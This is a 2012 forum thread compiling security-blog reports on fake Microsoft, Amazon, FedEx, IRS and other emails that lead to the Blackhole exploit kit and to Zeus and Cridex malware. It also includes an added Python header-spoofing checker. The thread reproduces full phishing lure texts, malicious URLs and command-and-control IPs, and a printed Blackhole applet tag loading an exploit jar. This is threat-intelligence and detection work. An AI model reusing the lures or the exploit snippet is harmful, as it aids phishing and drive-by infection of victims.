-
SPAM frauds, fakes, and other MALWARE deliveries...
FYI...
Fake MS email phish delivers Zeus via Java vuln ...
- https://isc.sans.edu/diary.html?storyid=14020
Last Updated: 2012-09-01 - "Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here*, per a change to Microsoft services as of 27 AUG. The evil version of this email will subject victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant... (evil) email including the following header snippet:
Received: from [101.5.162.236] ([101.5.162.236]) by
inbound94.exchangedefender .com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn .com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
101.5.162.236 is in China, 65.55.52.232 is Microsoft. The legitimate email will include a hyperlink for http://email.microsoft.com/Key-98503...15.C.KK.DlNkNK , which points to the above mentioned services agreement.
(Obfuscated to protect the innocent): The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post**.
Source code review of the web page served included <applet/code="ndshesa.ndshesf"/archive="Leh.jar"><param/nam=123 name=uid value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:034:034:02:065:071:034"/></applet>
The VirusTotal link for Leh.jar is here(3), and the VirusTotal link for the Zeus variant offered is here(4)...
Contemplate disabling Java(5) until the -next- update(6) is released..."
* http://windows.microsoft.com/en-US/w...ices-agreement
** http://community.websense.com/blogs/...ploit-kit.aspx
3) https://www.virustotal.com/file/2510...8bc9/analysis/
File name: Leh.jar
Detection ratio: 8/42
Analysis date: 2012-09-01 05:28:51 UTC
4) https://www.virustotal.com/file/98bb...is/1346461231/
File name: updateflashplayer.exe
Detection ratio: 6/42
Analysis date: 2012-09-01 01:00:31 UTC
5) http://krebsonsecurity.com/how-to-un...m-the-browser/
6) https://isc.sans.edu/diary.html?storyid=14017
___
101.5.162.236
101.5.0-255.*
inetnum: 101.5.0.0 - 101.5.255.255
netname: TSINGHUA-CN
country: CN
origin: AS4538
http://www.google.com/safebrowsing/d...c?site=AS:4538
... 231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-02, and the last time suspicious content was found was on 2012-09-02... We found 27 site(s)... that infected 743 other site(s).
___
- https://krebsonsecurity.com/2012/08/...ged-two-flaws/
"... If you want to test whether you’ve successfully disabled Java, check out Rapid7's page, http://www.isjavaexploitable.com/ ."
:sad: :mad:
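The diary's check above (the IP in the first-hop Received header is in China, while a genuine Microsoft notice arrives from a Microsoft relay) can be automated at the mail gateway. What follows is an added example, not code from the ISC diary or from this thread. It trusts only the Received line written by our own border MX, since any Received lines below that one were already in the message when it arrived and can be forged by the sender, extracts the connecting IP from that line, and compares it with an allow-list keyed on the From: domain. The MX name mx.example.com, the allow-list (65.55.0.0/16, widened from the single msn.com relay 65.55.52.232 quoted in the diary) and the three sample messages are assumptions constructed for this example; the two IP addresses are the ones from the diary.

```python
"""Added example: first-hop origin check for a claimed sender domain.
Not from the ISC diary; the MX name, CIDR policy and messages are constructed."""
import ipaddress
import re
from email import message_from_string
from email.policy import default

OUR_MX = "mx.example.com"  # assumed name of our own border MX

# Assumed policy: the networks that genuine mail claiming each From: domain
# should reach our MX from. 65.55.52.232 is the msn.com relay quoted in the
# diary; widening it to a /16 is an assumption (a real deployment would use SPF).
EXPECTED_NETWORKS = {
    "microsoft.com": [ipaddress.ip_network("65.55.0.0/16")],
}

# "from <helo> (<optional reverse name> [<ip>])": the connecting IP as recorded
# by the MTA that accepted the connection. Matches "from [ip] ([ip])" and
# "from host ([ip])" as quoted in the diary, and "from host (rdns [ip])".
RECEIVED_FROM = re.compile(
    r"from\s+(?P<helo>\S+)\s+\([^)\[]*\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\)"
)


def trusted_origin_ip(msg, our_mx=OUR_MX):
    """IP that connected to our own MX, or None if that hop is not found.

    Only the Received line our MX wrote ("by <our_mx>") is trusted; lines below
    it were supplied by the sender and may be forged to name a legitimate relay.
    """
    by_us = re.compile(r"\bby\s+" + re.escape(our_mx) + r"\b", re.IGNORECASE)
    for hop in msg.get_all("Received") or []:
        hop = " ".join(str(hop).split())  # unfold and normalise whitespace
        if by_us.search(hop):
            m = RECEIVED_FROM.search(hop)
            return ipaddress.ip_address(m.group("ip")) if m else None
    return None


def sender_domain(msg):
    """Domain of the first From: address, lower-cased, or '' if absent."""
    hdr = msg["From"]
    if hdr is None or not hdr.addresses:
        return ""
    return hdr.addresses[0].domain.lower()


def origin_of(raw_message, our_mx=OUR_MX):
    return trusted_origin_ip(message_from_string(raw_message, policy=default), our_mx)


def classify(raw_message, our_mx=OUR_MX):
    """'suspicious' if the claimed domain has a policy and the trusted origin
    violates it, 'ok' if it complies, 'unknown' if no policy or no trusted hop."""
    msg = message_from_string(raw_message, policy=default)
    expected = EXPECTED_NETWORKS.get(sender_domain(msg))
    origin = trusted_origin_ip(msg, our_mx)
    if expected is None or origin is None:
        return "unknown"
    return "ok" if any(origin in net for net in expected) else "suspicious"


# Constructed messages; the Received lines reuse the two IPs from the diary.
PHISH = """\
Received: from [101.5.162.236] ([101.5.162.236]) by mx.example.com (8.13.8/8.13.1)
 with ESMTP id q7VFDPjO029166
From: Microsoft <noreply@microsoft.com>
Subject: Important Changes to Microsoft Services Agreement

(constructed body)
"""

LEGIT = """\
Received: from smtpi.msn.com ([65.55.52.232]) by mx.example.com
 with Microsoft SMTPSVC(6.0.3790.4900)
From: Microsoft <noreply@microsoft.com>
Subject: Important Changes to Microsoft Services Agreement

(constructed body)
"""

# The same phish, but the sender appended a forged hop naming the real relay.
# It sits below our MX's own line, so it is ignored and the verdict is unchanged.
FORGED = PHISH.replace(
    "From: Microsoft",
    "Received: from smtpi.msn.com ([65.55.52.232]) by relay.attacker.invalid\n"
    "From: Microsoft",
)

if __name__ == "__main__":
    for name, raw in (("phish", PHISH), ("legit", LEGIT), ("forged", FORGED)):
        print(name, classify(raw))
```

This is the manual version of what SPF and DMARC formalise; the point worth keeping even with those deployed is which Received line you may believe: only the one your own MTA added.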
-
Fake Amazon email exploits recent Java vuln ...
FYI...
Fake ‘Amazon order’ email exploits recent Java vuln ...
- http://community.websense.com/blogs/...erability.aspx
03 Sep 2012 - "... Websense... has detected a new malicious email campaign purporting to be an order verification email from Amazon directing victims to a page containing the recent Java exploit. If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data. Oracle have released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681*)... On 1st September, Websense... intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’ enticing the recipient to ‘click here’ to verify a fictitious order as shown in this sample:
> http://community.websense.com/cfs-fi...2D00_550x0.jpg
Once the victim has clicked the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit... an analysis of this file can also be found on VirusTotal**..."
* http://community.websense.com/blogs/...2012-4681.aspx
** https://www.virustotal.com/file/2510...8bc9/analysis/
File name: 9c5abf8889c34b3a36c6699b40ef6717c95ac6e1
Detection ratio: 12/42
Analysis date: 2012-09-03
:mad:
-
Fake Google email contains a trojan ...
FYI...
Another round of "Spot the Exploit E-Mail"
- https://isc.sans.edu/diary.html?storyid=14029
Last Updated: 2012-09-04 - "We have come to expect quality phishing/fake email work these days...
> https://isc.sans.edu/diaryimages/amexemail1.png
> https://isc.sans.edu/diaryimages/amexemail2.png
> https://isc.sans.edu/diaryimages/amexemail3.png
... javascript will then -redirect- the user to one of these two IP addresses:
96.47.0.163, 108.178.59.26
both IP addresses yield heavily obfuscated javascript. The wepawet analysis can be found here:
- http://wepawet.iseclab.org/view.php?...69729c&type=js
It appears to be the usual "what vulnerable plugin are you running today?" javascript."
___
Fake Google email contains a trojan ...
- http://h-online.com/-1698349
04 Sep 2012 - "Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from "accounts-noreply @google .com" with the subject "Suspicious sign in prevented" is being sent en masse -claiming- that a hijacker has attempted to access the mail recipient's Google Account. The message says that the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim's system. While Google does sometimes send emails like this to users, they -never- contain attachments; users that receive such an email are advised to delete them. According to VirusTotal*, the trojan is currently detected by just half of 42 anti-virus programs..."
* https://www.virustotal.com/file/df0b...c23a/analysis/
File name: Google_Accounts_Alert-3944-J5I-4169.zip
Detection ratio: 21/42
Analysis date: 2012-09-04 09:25:32 UTC
___
Fake ‘Wire Transfer Confirmation’ emails lead to Black Hole exploit kit ...
- http://blog.webroot.com/2012/09/04/s...e-exploit-kit/
Sep 4, 2012 - "Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a client-side exploits-serving landing URL, courtesy of the Black Hole web malware exploitation kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample exploits served: CVE-2010-0188; CVE-2010-1885
Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e * ..."
* https://www.virustotal.com/file/932f...fd00/analysis/
File name: 7fe4d2e52b6f3f22b2f168e8384a757e
Detection ratio: 32/42
Analysis date: 2012-08-28
___
Fake LinkedIn spam leads to malware ...
- http://blog.dynamoo.com/2012/09/link...85926-and.html
4 Sep 2012 - "This fake LinkedIn spam leads to malware on 108.178.59.26 and myasuslaptop .com:
Date: Tue, 04 Sep 2012 10:43:03 +0100
From: "noreply" [noreply@linkedin.com]
Subject: Link LinkedIn Mail
LinkedIn
REMINDERS
Invitation reminders:
• From Charlie Alexander (Mexico Key Account Director at Quanta)
PENDING MESSAGES
• There are a total of 5 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
The malicious payload (report here*)..."
* http://wepawet.iseclab.org/view.php?...746065&type=js
Detection results
Detector Result
Jsand 2.3.4 malicious
In particular, the following URL was found to contain malicious content:
hxxp :// 108.178.59.26 /bv6rcs3v1ithi.php?w=6de4412e62fd13be
Exploits
Name Description Reference
HPC URL Help Center URL Validation Vulnerability CVE-2010-1885 ...
... My personal preference with any emails purporting to be from LinkedIn is to block them at the perimeter. As far as most businesses are concerned it is simply a playground for recruiters trying to poach your staff."
:mad: :mad:
-
Fake 'QuickBooks Update: Urgent’ emails lead to BlackHole exploit kit
FYI...
Fake 'QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit
- http://blog.webroot.com/2012/09/05/i...e-exploit-kit/
Sep 5, 2012 - "... cybercriminals behind the recently profiled ‘Intuit Marketplace’ themed campaign resume impersonating Intuit, with a newly launched round consisting of millions of Intuit themed emails. The theme this time? Convincing users that in order to access QuickBooks they would have to install the non-existent Intuit Security Tool. In reality though, clicking on the links points to a Black Hole exploit kit landing URL that ultimately drops malware on the affected hosts...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Client-side exploits serving URL: hxxp ://roadmateremove .org /main.php?page=9bb4aab85fa703f5 - 89.248.231.122; 208.91.197.27
... Name servers part of the campaign’s infrastructure:
ns1.chemrox .net – 208.91.197.27; 173.234.9.17
ns2.chemrox .net – 7.25.179.23
Upon successful client-side exploitation, the campaign drops MD5: f621be555dc94a8a370940c92317d575 * ...
* https://www.virustotal.com/file/eee0...8137/analysis/
File name: f621be555dc94a8a370940c92317d575
Detection ratio: 33/42
Analysis date: 2012-09-01
...Once executed, the sample phones back to 87.120.41.155 :8080/mx5/B /in. We’ve already seen the same command and control IP used in the following previously profiled malicious campaigns..."
:mad:
-
Bogus greeting card emails serve exploits and malware
FYI...
Bogus greeting card emails serve exploits and malware
- http://blog.webroot.com/2012/09/06/c...s-and-malware/
Sep 6, 2012 - "Remember the recently profiled 123greetings .com themed malicious campaign? It appears that over the past 24 hours, the cybercriminals behind it have resumed spamvertising millions of emails pointing to additional compromised URLs in a clear attempt to improve their click-through rates...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Detection rate for a sample JavaScript redirection: MD5: 75e030e741875d29f12b179f2657e5fd* – ... Trojan.JS.Iframe.aby; Trojan.Webkit!html
Upon successful client-side exploitation, the campaign drops MD5: 864e1dec051cbd800ed59f6f91554597** – ... W32/Yakes.AP!tr
Once executed, the malware phones back to 216.38.12.158 :8080/mx/5/B/in... Another domain is known to have been responding to the same IP in the past..."
* https://www.virustotal.com/file/dcb5...is/1346492654/
File name: greetings.html
Detection ratio: 5/42
Analysis date: 2012-09-01
** https://www.virustotal.com/file/df92...1ffc/analysis/
File name: 97273d9507c8d78679c8cdf591715760aef0c59c
Detection ratio: 24/42
Analysis date: 2012-09-03
:mad:
-
$100 billion in losses to cybercrime
FYI...
$100 billion in losses to cybercrime ...
- http://h-online.com/-1701983
6 Sep 2012 - "According to Symantec's 2012 Norton Cybercrime Report*, worldwide, private individuals have suffered approximately $100 billion (more than £69 billion at the current exchange rate) in financial losses as a result of cybercrime. In the period from July 2011 to July 2012, losses averaged $197 (£124) per victim. A total of 556 million adults are reported to have fallen victim to malware, phishing or similar virtual crimes. The report claims that there are 1.5 million victims of cybercrime each day, or about 18 per second. The security specialist's report also states that two-thirds of internet users have been caught out by cybercriminals at some point in their lives, and almost half (46%) were victims during the period covered by the report... Around 40% of people don't use complex passwords or don't change their passwords regularly. There appears to be a clear trend of cybercriminals targeting social networks and mobile devices, with around 20% of users having suffered losses as a result of such attacks. The study also claims that 15% of social media accounts have been compromised and that 10% of users have fallen for fake links and scams on social networks. A total of 75% of those surveyed believe that cybercriminals are increasingly targeting social networking services. Losses within the EU are reported to amount to $16 billion (over £10 billion). China emerges as the country whose citizens have suffered the greatest financial loss – $46 billion (nearly £29 billion) – while Russia has the largest number of victims, with 92% of users surveyed in the country having experienced problems with cybercrime. The report surveyed more than 13,000 online adults aged 18-64 in 24 different countries."
* http://www.symantec.com/about/news/r...id=20120905_02
Sept. 5, 2012
___
- http://yro.slashdot.org/story/12/09/...ut-just-as-bad
Sep 6, 2012
> http://blogs.cio.com/security/17375/...ages-disappear
:mad::mad::mad:
-
Fake FedEx spam 2012.09.07 ...
FYI...
FedEx spam ...
- http://blog.dynamoo.com/2012/09/fede...allerynet.html
7 Sep 2012 - "Two fake FedEx campaigns... with different payload sites of dushare .net and gsigallery .net. In the first case, the malicious payload is... (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia). In the second case the payload is... (report here**) also hosted on 203.91.113.6..." (More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?...043407&type=js
Detector Result
Jsand 2.3.4 malicious
** http://wepawet.iseclab.org/view.php?...038935&type=js
Detector Result
Jsand 2.3.4 malicious
- http://google.com/safebrowsing/diagn...sigallery.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 9 trojan(s), 1 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...e=dushare.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 2 trojan(s), 1 scripting exploit(s)..."
___
- http://blog.dynamoo.com/2012/09/fede...onahannet.html
7 Sep 2012 - "... fake FedEx spam leads to malware on studiomonahan .net... The malicious payload is... (report here*) hosted on 206.253.164.43 (Hostigation, US)...
(More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?...947943&type=js
Detector Result
Jsand 2.3.4 malicious
:mad:
-
Fake BBB email phish/Spam leads to malware
FYI...
Fake BBB email phish/Spam leads to malware
- https://isc.sans.edu/diary.html?storyid=14053
Last Updated: 2012-09-09 - "We received another piece of spam... pretending to be from the Better Business Bureau. Analysis of the file transferred (W6w8sCyj.exe) from prog .it appears to be a piece of malware (Win32/Cridex.Q) used to communicate via SSL with a C&C server... List of domains/IP to watch for and block:
ajaxworkspace .com, prog .it, la-liga .ro, ejbsa .com .ar, technerds .ca, 108.178.59.12
The email looks like this:
Better Business Bureau©
Start With Trust©
Sat, 08 Sep 2012 01:54:02 +0700
RE: Case # 78321602 <hxxp [:]//prog .it/EH564Bf/index.html>
Dear Sirs,
The Better Business Bureau has got the above mentioned complaint from one of your customers concerning their business relations with you. The details of the consumer's concern are contained in attached document. Please give attention to this case and advise us of your opinion as soon as possible. We encourage you to open the COMPLAINT REPORT to answer on this complaint.
We look forward to your prompt response.
Faithfully yours,
Ann Hegley
Dispute Counselor
Better Business Bureau
[1] http://anubis.iseclab.org/?action=re...a4&format=html
[2] http://wepawet.iseclab.org/view.php?...109082&type=js
[3] http://wepawet.iseclab.org/view.php?...109182&type=js
[4] http://wepawet.iseclab.org/view.php?...109422&type=js
[5] https://www.virustotal.com/file/126e...9187/analysis/
File name: vt_20541851.@
Detection ratio: 3/42
Analysis date: 2012-09-08
[6] http://www.microsoft.com/security/po...Win32%2fCridex
:mad:
-
Fake US Airways email spam...
FYI...
Fake US Airways email spam ...
- http://blog.dynamoo.com/2012/09/us-a...sgrovenet.html
11 Sep 2012 - "A couple of samples of a fake US Airways spam email leading to malware on blue-lotusgrove .net:
Date: Tue, 11 Sep 2012 15:32:42 -0300
From: "US Airways - Reservations" [reservations @myusairways .com]
Subject: Please confirm your US Airways online registration...
Date: Tue, 11 Sep 2012 23:29:14 +0700
From: "US Airways - Reservations" [intuitpayroll @e.payroll.intuit .com]
Subject: US Airways online check-in...
The malicious payload is at [donotclick]blue-lotusgrove .net/main.php?page=559e008e5ed98bf7 (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia), the same IP used in this attack**... domains on the same server... can all be considered to be malicious...
(More detail/URL list at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?...388149&type=js
Detector Result
Jsand 2.3.4 malicious
** http://blog.dynamoo.com/2012/09/fede...allerynet.html
___
- http://security.intuit.com/alert.php?a=57
Last updated 9/13/2012
:mad:
-
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
FYI...
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
- http://community.websense.com/blogs/...ploit-kit.aspx
13 Sep 2012 - "Since Blackhole Exploit Kit 2.0* was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email. Websense... has recently intercepted a few malicious email campaigns that try to lure the victims to Web pages that host this popular exploit kit... One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com... A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters... The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version. ADP is one of the largest names in payroll services... Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
... one of the possible redirection paths:
hxxp ://allbarswireless .com/HXwcDdQ/index.html
hxxp ://ash-polynesie .com/AjVSXvus/js.js
hxxp ://108.60.141.7 /tfvsfios6kebvras .php?r=dwtd6xxjpq8tkatb
hxxp ://108.60.141.7 /links/ differently-trace.php ...
Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message." Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":
> http://community.websense.com/cfs-fi...5F00_blur1.jpg
... redirection chain here is similar:
hxxp ://www.tryakbar .com/tLbM3r/index.html
hxxp ://sportmania .so/JP3q2538/js.js
hxxp ://173.255.221.74 /tfvsfios6kebvras .php?r=rs3mwhukafbiamcm ...
Another scheme thanks the user for signing up for a premium service. Subject lines include "Thank you for activating paid services":
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:
hxxp ://www.svstk. ru/templates/beez/check.php
hxxp ://bode-sales .net/main.php?page=3c23940fb7350489
And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended. Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
Here again, simple redirection leads to typical "/main.php?page=" type URLs.
hxxp ://kahvikuppi .org/achsec.html
hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7
Note that as part of the update to Blackhole 2.0, we are much more likely to see URLs like those used in the first two examples, rather than the latter two, due to the dynamic URL generation capability."
* http://community.websense.com/blogs/...es-to-2-0.aspx
- https://isc.sans.edu/diary.html?storyid=14098
2012-09-14
ADP spam ...
- http://blog.dynamoo.com/2012/09/adp-...624937122.html
13 Sep 2012 - "... fake ADP spam tries to load malware from 46.249.37.122... After clicking the link bouncing through a couple of redirectors, the victim ends up at [donotclick]46.249.37.122 /links/systems-links_warns.php which appears to be generating a 404 error (although it could be fake). This could be a legitimate but hacked server as it is also the IP address for a proxy service called dutchprox.com. In any case, you might decide you want to block the IP just in case."
- http://www.bbb.org/blog/wp-content/u...scamalert1.jpg
Sep 12, 2012
___
- http://blog.commtouch.com/cafe/data-...re-campaign-2/
Sep 13, 2012
:fear::mad:
-
Fake FedEx email invoice leads to BlackHole Exploit kit
FYI...
Fake FedEx email invoice leads to BlackHole Exploit kit
- http://blog.webroot.com/2012/09/14/s...e-exploit-kit/
Sep 14, 2012 - "... cybercriminals have launched yet another massive spam run, this time impersonating FedEx in an attempt to trick its customers into clicking on a malware and exploits-serving URL found in the malicious email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample client-side exploits serving URLs: hxxp ://studiomonahan .net/main.php?page=2bfd5695763b6536 (200.42.159.6, AS10481; 206.253.164.43, AS6921); hxxp ://gsigallery .net/main.php?page=2bfd5695763b6536 (208.91.197.54, AS40034)
Sample client-side exploits served: CVE-2010-1885
Detection rate for a sample JavaScript redirector: MD5: 32a74240c7e1a34a2a8ed8749758ef15* ...
JS/Iframe.FR; Trojan-Downloader.JS.Iframe.dbe; JS/Exploit-Blacole.hd
Upon successful client-side exploitation, the campaign drops MD5: f9904f305de002ad5c0ad4b4648d0ca7** ... Trojan.Win32.Obfuscated.aopm; Worm:Win32/Cridex.E
... and MD5: 0e2c968865d34c8570bb69aa6156b915*** Worm.Win32.Cridex.jb
The first sample phones back to 195.111.72.46 :8080/mx/5/B/in/ (AS1955) and to 87.120.41.155 :8080/mx/5/B/in (AS13147), and the second sample initiates DNS queries to droppinlever .pro; lambolp700tuning .ru and it also produces TCP traffic to 146.185.220.32 on port 443, as well as to 192.5.5.241 again on port 443.
... We’ve already seen numerous malicious campaigns phoning back one of these command and control servers, 87.120.41.155 :8080/mx/5/B/in in particular..."
* https://www.virustotal.com/file/ae6b...is/1347545788/
File name: Fedex.html
Detection ratio: 8/41
Analysis date: 2012-09-13
** https://www.virustotal.com/file/b417...9ba0/analysis/
File name: f9904f305de002ad5c0ad4b4648d0ca7.malware
Detection ratio: 30/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/cb66...4a47/analysis/
File name: a36fc381c480e4e7ee09c89d950195c2
Detection ratio: 24/42
Analysis date: 2012-09-11
:fear: :mad:
-
Multiple fake emails/SPAM lead to malware...
FYI...
Multiple fake emails/SPAM lead to malware...
"Photos" Spam...
- http://blog.dynamoo.com/2012/09/phot...reuomopru.html
18 Sept 2012 14:43 - "This spam leads to malware on diareuomop .ru:
From: Carleen Garrett
Sent: Tuesday, September 18, 2012 3:17:33 PM
Subject: Photos
Hi,
as promised your photos - hxxp ://flyershot .com/gallery.htm
The payload is at [donotclick]diareuomop.ru:8080/forum/links/column.php hosted on the following IPs: 50.56.92.47, 203.80.16.81, 46.51.218.71
These IPs are a subset of the ones found here*. Block 'em if you can."
Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intu...eloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:
Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagn...erneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-...achingnet.html
17 Sept 2012 22:30 - "This spam leads to malware on virtual-geocaching .net:
Date: Mon, 17 Sep 2012 11:28:14 -0600
From: Internal Revenue Service [tangierss4 @porterorlin .com]
Subject: IRS report of not approved tax transfer
Your State Tax transfer (ID: 30062091798009), recently sent from your checking account was returned by Internal Revenue Service payment processing unit.
Not Accepted Tax transaction
Tax Transaction ID: 30062091798009
Reason of rejection See details in the report below
Federal Tax Transaction Report tax_report_30062091798009.doc (Microsoft Word Document)
Internal Revenue Service 3192 Aliquam Rd. Davis 71320 VA
The malicious payload is at [donotclick]virtual-geocaching .net/main.php?page=7de3f5c4200c896e (report here) on 203.91.113.6 (G Mobile, Mongolia) as used in this recent attack and several others..."
> http://google.com/safebrowsing/diagn...eocaching.net/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 57 trojan(s), 8 exploit(s), 3 scripting exploit(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-...mmwrapnet.html
17 Sept 2012 16:06 - "This fake IRS spam leads to malware on thebummwrap .net:
From: Internal Revenue Service [mailto:fascinatesh07 @deltamar .net]
Sent: 17 September 2012 15:30
Subject: Your federal tax transaction has been not accepted
Your State Tax transaction (ID: 60498447771657), recently initiated from your bank account was canceled by The Electronic Federal Tax Payment System.
Not Accepted Tax transaction
Tax Transaction ID: 60498447771657
Rejection code See details in the report below
Income Tax Transaction Report tax_report_60498447771657.doc (Microsoft Word Document)
Internal Revenue Service Ap #822-9450 Cum Avenue Edmond 33020 MI
The malicious payload is at [donotclick]thebummwrap .net/main.php?page=7de3f5c4200c896e hosted on 203.91.113.6 (G Mobile Mongolia) which has been used several times recently for evil purposes..."
___
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Last Updated September 18, 2012
:mad::mad:
-
Fake US Airways emails serve exploits and malware
FYI...
Fake US Airways emails serve exploits and malware ...
- http://blog.webroot.com/2012/09/18/s...s-and-malware/
Sep 18, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating U.S Airways, in an attempt to trick users into clicking on the malicious links found in the legitimate-looking emails...
Sample screenshot of the spamvertised US Airways themed email:
> https://webrootblog.files.wordpress....explot_kit.png
Sample client-side exploits served: http://web.nvd.nist.gov/view/vuln/de...=CVE-2010-1885 - 9.3 (HIGH)
Responding to the same IP 203.91.113.6 (AS24559) ...
Detection rate for a sample JavaScript redirection: MD5: 5c5a3c6e91c1c948c735e90009886e37 *
... Mal/Iframe-W
Upon successful client-side exploitation, the campaign drops MD5: 9069210d0758b34d8ef8679f712b48aa **
... Trojan.Winlock.6049; W32/Cridex.R
Upon execution, the sample phones back to 199.71.213.194 :8080/mx/5/B/in/ (AS40676).
More MD5s are known to have phoned back to the same IP..."
* https://www.virustotal.com/file/08cb...is/1347403787/
File name: Airways.html
Detection ratio: 3/42
Analysis date: 2012-09-11
** https://www.virustotal.com/file/c6c8...b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
:mad:
-
Malicious UPS/FedEx emails re: iPhone 5 orders
FYI...
Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/...-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-fi...ion_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-fi...00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___
(More) Fake UPS e-mail messages ...
> http://tools.cisco.com/security/cent...?alertId=25171
Sep 19, 2012
:mad:
